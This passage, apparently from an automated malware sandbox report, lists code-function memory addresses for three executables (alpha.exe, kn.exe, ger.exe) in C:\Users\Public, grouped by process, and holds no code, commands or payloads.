        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F05B704_2_00007FF744F05B70
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F118D44_2_00007FF744F118D4
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F0B0D84_2_00007FF744F0B0D8
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F0372C4_2_00007FF744F0372C
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F085104_2_00007FF744F08510
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F09B504_2_00007FF744F09B50
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F018844_2_00007FF744F01884
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F2AFBC4_2_00007FF744F2AFBC
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F02C484_2_00007FF744F02C48
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F0AA545_2_00007FF744F0AA54
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F07D305_2_00007FF744F07D30
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F155545_2_00007FF744F15554
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F137D85_2_00007FF744F137D8
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F142245_2_00007FF744F14224
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F2AA305_2_00007FF744F2AA30
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F0D2505_2_00007FF744F0D250
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F09E505_2_00007FF744F09E50
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F10A6C5_2_00007FF744F10A6C
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F0E6805_2_00007FF744F0E680
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F2EE885_2_00007FF744F2EE88
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F27F005_2_00007FF744F27F00
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F315385_2_00007FF744F31538
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F06EE45_2_00007FF744F06EE4
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F2D9D05_2_00007FF744F2D9D0
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F081D45_2_00007FF744F081D4
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F076505_2_00007FF744F07650
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F052405_2_00007FF744F05240
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F08DF85_2_00007FF744F08DF8
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F04A305_2_00007FF744F04A30
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F022205_2_00007FF744F02220
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F0CE105_2_00007FF744F0CE10
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F034105_2_00007FF744F03410
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F06BE05_2_00007FF744F06BE0
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F2AC4C5_2_00007FF744F2AC4C
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F178545_2_00007FF744F17854
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F03F905_2_00007FF744F03F90
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F05B705_2_00007FF744F05B70
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F118D45_2_00007FF744F118D4
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F0B0D85_2_00007FF744F0B0D8
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F0372C5_2_00007FF744F0372C
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F085105_2_00007FF744F08510
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F09B505_2_00007FF744F09B50
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F018845_2_00007FF744F01884
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F2AFBC5_2_00007FF744F2AFBC
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F02C485_2_00007FF744F02C48
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F142248_2_00007FF744F14224
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F0AA548_2_00007FF744F0AA54
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F10A6C8_2_00007FF744F10A6C
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F155548_2_00007FF744F15554
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F137D88_2_00007FF744F137D8
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F2AA308_2_00007FF744F2AA30
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F0D2508_2_00007FF744F0D250
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F09E508_2_00007FF744F09E50
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F0E6808_2_00007FF744F0E680
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F2EE888_2_00007FF744F2EE88
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F07D308_2_00007FF744F07D30
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F27F008_2_00007FF744F27F00
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F315388_2_00007FF744F31538
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F06EE48_2_00007FF744F06EE4
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F2D9D08_2_00007FF744F2D9D0
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F081D48_2_00007FF744F081D4
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F076508_2_00007FF744F07650
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F052408_2_00007FF744F05240
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F08DF88_2_00007FF744F08DF8
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F04A308_2_00007FF744F04A30
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F022208_2_00007FF744F02220
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F0CE108_2_00007FF744F0CE10
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F034108_2_00007FF744F03410
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F06BE08_2_00007FF744F06BE0
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F2AC4C8_2_00007FF744F2AC4C
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F178548_2_00007FF744F17854
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F03F908_2_00007FF744F03F90
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F05B708_2_00007FF744F05B70
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F118D48_2_00007FF744F118D4
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F0B0D88_2_00007FF744F0B0D8
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F0372C8_2_00007FF744F0372C
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F085108_2_00007FF744F08510
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F09B508_2_00007FF744F09B50
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F018848_2_00007FF744F01884
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F2AFBC8_2_00007FF744F2AFBC
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F02C488_2_00007FF744F02C48
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60803CCB89_2_00007FF60803CCB8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F62F389_2_00007FF607F62F38
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60803F0209_2_00007FF60803F020
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60803BC109_2_00007FF60803BC10
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60803C1209_2_00007FF60803C120
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080638009_2_00007FF608063800
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F529409_2_00007FF607F52940
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB69849_2_00007FF607FB6984
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA89909_2_00007FF607FA8990
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802A9F09_2_00007FF60802A9F0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FBE9F09_2_00007FF607FBE9F0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB09EC9_2_00007FF607FB09EC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDAA009_2_00007FF607FDAA00
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608024A409_2_00007FF608024A40
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60803AA589_2_00007FF60803AA58
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608044A589_2_00007FF608044A58
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD6A849_2_00007FF607FD6A84
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDEA7C9_2_00007FF607FDEA7C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA4B309_2_00007FF607FA4B30
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F74B689_2_00007FF607F74B68
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608006B949_2_00007FF608006B94
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC8BD49_2_00007FF607FC8BD4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F9CBFC9_2_00007FF607F9CBFC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F5AC089_2_00007FF607F5AC08
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA0C289_2_00007FF607FA0C28
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608028C589_2_00007FF608028C58
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60805CC8C9_2_00007FF60805CC8C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FCCC809_2_00007FF607FCCC80
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FECCA89_2_00007FF607FECCA8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608048CF49_2_00007FF608048CF4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F68D009_2_00007FF607F68D00
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE2CF89_2_00007FF607FE2CF8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FACD109_2_00007FF607FACD10
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB2D189_2_00007FF607FB2D18
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA8D2C9_2_00007FF607FA8D2C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608032D6C9_2_00007FF608032D6C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC6D7C9_2_00007FF607FC6D7C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7EDA49_2_00007FF607F7EDA4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608034E589_2_00007FF608034E58
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608038EAC9_2_00007FF608038EAC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F8EED49_2_00007FF607F8EED4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F56EF49_2_00007FF607F56EF4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F78F1C9_2_00007FF607F78F1C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF4F949_2_00007FF607FF4F94
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F84F909_2_00007FF607F84F90
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F510309_2_00007FF607F51030
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F9107C9_2_00007FF607F9107C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FAD0949_2_00007FF607FAD094
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F6B09C9_2_00007FF607F6B09C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801511C9_2_00007FF60801511C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F701409_2_00007FF607F70140
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F581709_2_00007FF607F58170
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FAC1D09_2_00007FF607FAC1D0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDA1E89_2_00007FF607FDA1E8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080641F89_2_00007FF6080641F8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801821C9_2_00007FF60801821C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080342749_2_00007FF608034274
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7227C9_2_00007FF607F7227C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC62809_2_00007FF607FC6280
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FAE29C9_2_00007FF607FAE29C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60803234C9_2_00007FF60803234C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE63749_2_00007FF607FE6374
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F9E3A09_2_00007FF607F9E3A0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB03989_2_00007FF607FB0398
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE43D09_2_00007FF607FE43D0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD84149_2_00007FF607FD8414
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F744109_2_00007FF607F74410
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60803E4309_2_00007FF60803E430
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F5A4249_2_00007FF607F5A424
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60806842F9_2_00007FF60806842F
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FCA4509_2_00007FF607FCA450
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FCC4509_2_00007FF607FCC450
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA84849_2_00007FF607FA8484
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080304909_2_00007FF608030490
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE84889_2_00007FF607FE8488
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F964A89_2_00007FF607F964A8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC24D49_2_00007FF607FC24D4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F644E09_2_00007FF607F644E0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080384D89_2_00007FF6080384D8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDE4F09_2_00007FF607FDE4F0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F5C5209_2_00007FF607F5C520
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080245389_2_00007FF608024538
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB655C9_2_00007FF607FB655C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F885709_2_00007FF607F88570
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA25809_2_00007FF607FA2580
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FEE57C9_2_00007FF607FEE57C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080485A89_2_00007FF6080485A8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080585EC9_2_00007FF6080585EC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F605E09_2_00007FF607F605E0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801C6309_2_00007FF60801C630
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB86309_2_00007FF607FB8630
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FBC6D09_2_00007FF607FBC6D0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FCC6F89_2_00007FF607FCC6F8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080467509_2_00007FF608046750
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080007D09_2_00007FF6080007D0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD27D09_2_00007FF607FD27D0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDC7F09_2_00007FF607FDC7F0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDE8449_2_00007FF607FDE844
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080428549_2_00007FF608042854
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080308C89_2_00007FF6080308C8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080348C49_2_00007FF6080348C4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60804994C9_2_00007FF60804994C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080479389_2_00007FF608047938
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDF9909_2_00007FF607FDF990
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD19AC9_2_00007FF607FD19AC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7F9B89_2_00007FF607F7F9B8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F51A109_2_00007FF607F51A10
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F83A409_2_00007FF607F83A40
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FCBA489_2_00007FF607FCBA48
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA1A609_2_00007FF607FA1A60
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608009A589_2_00007FF608009A58
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F67AB49_2_00007FF607F67AB4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB7AC89_2_00007FF607FB7AC8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801BB289_2_00007FF60801BB28
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FFFB509_2_00007FF607FFFB50
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE7B749_2_00007FF607FE7B74
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC1B849_2_00007FF607FC1B84
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F5FB849_2_00007FF607F5FB84
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F55BA49_2_00007FF607F55BA4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F79BC89_2_00007FF607F79BC8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FBDBF09_2_00007FF607FBDBF0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608003C109_2_00007FF608003C10
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F8FC209_2_00007FF607F8FC20
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FAFC349_2_00007FF607FAFC34
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA3C609_2_00007FF607FA3C60
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60805FC909_2_00007FF60805FC90
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD1C909_2_00007FF607FD1C90
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F6BCA49_2_00007FF607F6BCA4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F89CD09_2_00007FF607F89CD0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608019CC09_2_00007FF608019CC0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FABCE89_2_00007FF607FABCE8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F65D089_2_00007FF607F65D08
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F8DD209_2_00007FF607F8DD20
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB1D709_2_00007FF607FB1D70
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608007D709_2_00007FF608007D70
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA9D6C9_2_00007FF607FA9D6C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60805DD849_2_00007FF60805DD84
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FEBDA09_2_00007FF607FEBDA0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F61DE89_2_00007FF607F61DE8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F85DF79_2_00007FF607F85DF7
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE1E2C9_2_00007FF607FE1E2C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDBE709_2_00007FF607FDBE70
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FADEA49_2_00007FF607FADEA4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDDEB09_2_00007FF607FDDEB0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA1ED09_2_00007FF607FA1ED0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD9EE49_2_00007FF607FD9EE4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE5F049_2_00007FF607FE5F04
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F51F809_2_00007FF607F51F80
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608009FF89_2_00007FF608009FF8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB80189_2_00007FF607FB8018
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F880809_2_00007FF607F88080
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080220849_2_00007FF608022084
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FBC0B89_2_00007FF607FBC0B8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDF1689_2_00007FF607FDF168
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F6D1B89_2_00007FF607F6D1B8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA11C89_2_00007FF607FA11C8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA31E09_2_00007FF607FA31E0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080052909_2_00007FF608005290
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802D2B49_2_00007FF60802D2B4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FAD2C09_2_00007FF607FAD2C0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB92C49_2_00007FF607FB92C4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F5F2C09_2_00007FF607F5F2C0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC92D89_2_00007FF607FC92D8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE53189_2_00007FF607FE5318
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F873409_2_00007FF607F87340
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7B36C9_2_00007FF607F7B36C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60803B3AC9_2_00007FF60803B3AC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080433D09_2_00007FF6080433D0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080533D49_2_00007FF6080533D4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F573F89_2_00007FF607F573F8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FCD4109_2_00007FF607FCD410
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F9F4349_2_00007FF607F9F434
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F9D4409_2_00007FF607F9D440
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F554389_2_00007FF607F55438
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FFD4609_2_00007FF607FFD460
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB74789_2_00007FF607FB7478
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080094949_2_00007FF608009494
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080494A89_2_00007FF6080494A8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F754A09_2_00007FF607F754A0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080214F09_2_00007FF6080214F0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FCF5209_2_00007FF607FCF520
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F8156C9_2_00007FF607F8156C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080295809_2_00007FF608029580
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F8B58C9_2_00007FF607F8B58C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB55F09_2_00007FF607FB55F0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD95FC9_2_00007FF607FD95FC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F5F6109_2_00007FF607F5F610
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080336389_2_00007FF608033638
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F956489_2_00007FF607F95648
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7D6609_2_00007FF607F7D660
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080256609_2_00007FF608025660
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080076789_2_00007FF608007678
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080376789_2_00007FF608037678
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA76B09_2_00007FF607FA76B0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60800D6A09_2_00007FF60800D6A0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDF6D89_2_00007FF607FDF6D8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802D6DC9_2_00007FF60802D6DC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD37609_2_00007FF607FD3760
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA97909_2_00007FF607FA9790
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F6B7889_2_00007FF607F6B788
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F917D49_2_00007FF607F917D4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC77C89_2_00007FF607FC77C8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FBD7F09_2_00007FF607FBD7F0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F6F8009_2_00007FF607F6F800
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080038209_2_00007FF608003820
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F718309_2_00007FF607F71830
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE184C9_2_00007FF607FE184C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FED8589_2_00007FF607FED858
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080238749_2_00007FF608023874
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB78909_2_00007FF607FB7890
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA58CC9_2_00007FF607FA58CC
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A39166419_2_00007FF73A391664
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A39596C19_2_00007FF73A39596C
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A39605419_2_00007FF73A396054
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A39767019_2_00007FF73A397670
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A392D7019_2_00007FF73A392D70
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A399C7419_2_00007FF73A399C74
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A397C7C19_2_00007FF73A397C7C
